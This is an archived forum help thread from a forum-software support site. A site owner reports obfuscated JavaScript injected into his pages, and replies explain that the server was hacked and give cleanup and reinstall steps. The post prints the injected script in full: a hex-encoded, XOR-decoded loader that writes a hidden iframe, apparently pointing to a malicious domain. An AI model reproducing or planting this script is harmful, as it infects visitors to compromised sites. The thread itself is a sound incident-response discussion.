Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.

Javascript Worm? "testws35fdgh"

edited April 2007 in Vanilla 1.0 Help
Website located: So I visited my website today, and my noscript firefox extension was going crazy asking me to allow javascript. i haven't put any js on any of my webpages (aside from anything associated with Vanilla of course). I checked out the code, and there's a bunch of these: <div id="testws35fdgh"></div> <script language="JavaScript"> var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x34\x38\x30\x6b"; sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12; dst = ""; for(i = 0; i < sr.length; i++) { var d = parseInt(sr.charCodeAt(i) ^ 85); dst = dst + String.fromCharCode(d); } document.getElementById("testws35fdgh").innerHTML = dst; </script> Could someone let me know what's going on here? Thanks


  • Options
    Your server as been hacked. Back up everything to check how the code has been injected. Save you access log as well. And reinstall the forum, without extension.
  • Options
    MarkMark Vanilla Staff
    Follow Dinoboff's advice and definitely speak with your hosting provider. If you are on a shared server, another site may have been the hole and the entire server could have been affected.
  • Options
    Wow. I just googled for "testws35fdgh", and you don't seem to be alone in being infected. Most google results actually just seem to be infected sites, with one thing over at wordpress support which just states the problem, and that it is resolved (not how or anything), and one usenet discussion about it (I also found out that a number of forums take usenet discussions and make threads of them, for instance this thread which is a copy of the alt.comp.virus thread).

    Anyway, if yours is the same as the one discussed, that thing apparently opens an iframe to (a domain that has been suspended).
  • Options
    Well as soon as I found that code in index.php, I changed my password to a harder one. I also removed the code from index.php. But there's still about 20 occurances of the code when I view the source. Does anyone have ideas to find the rest of the code? Or should I just try a new install? @Mark: I'm pretty sure what you said has happened. I was having problems with a phpbb installation, so I submitted a support ticket to my hosts's website. I went back later to check on the ticket, and the entire site had been acting funky, probably now from the worm. Thanks to everyone for your help.
  • Options
    The important things are the content in DB and the settings in the conf folders. The easiest thing to do is to save the file in the conf folder/conf and clean them up. Wipe out the rest. Download the core and the extensions and put back your settings files in conf/.
  • Options
    MarkMark Vanilla Staff
    What Dinoboff said.

    Here's what I'd do:

    1. Back up your database.
    2. Download a copy to local (it's good to do this once in a while anyway).
    3. Download everything in your Vanilla conf folder.
    4. Open up your Vanilla conf folder and clean out any worm code.
    5. Wipe out all of your Vanilla files on the server.
    6. Download the new version of Vanilla.
    7. Upload the new Vanilla files and run a fresh install - use a new dummy database when installing.
    8. Download and re-install all of your Vanilla add-ons in your blank Vanilla forum.
    9. Re-upload your conf/settings.php and conf/database.php files so you point back at the old database and use your old configuration settings.
    10. Verify everything works as it should.
  • Options
    Thanks mark. I'm currently looking for some new web hosting. I'd rather just do away with this whole host. Their support website looks like its been affected by the worm as well.
  • Options
    *bump* for my curiosity, can you please identify 'this whole host' and ' Their support website'? this could also be seen as a PSA. Thank you.
This discussion has been closed.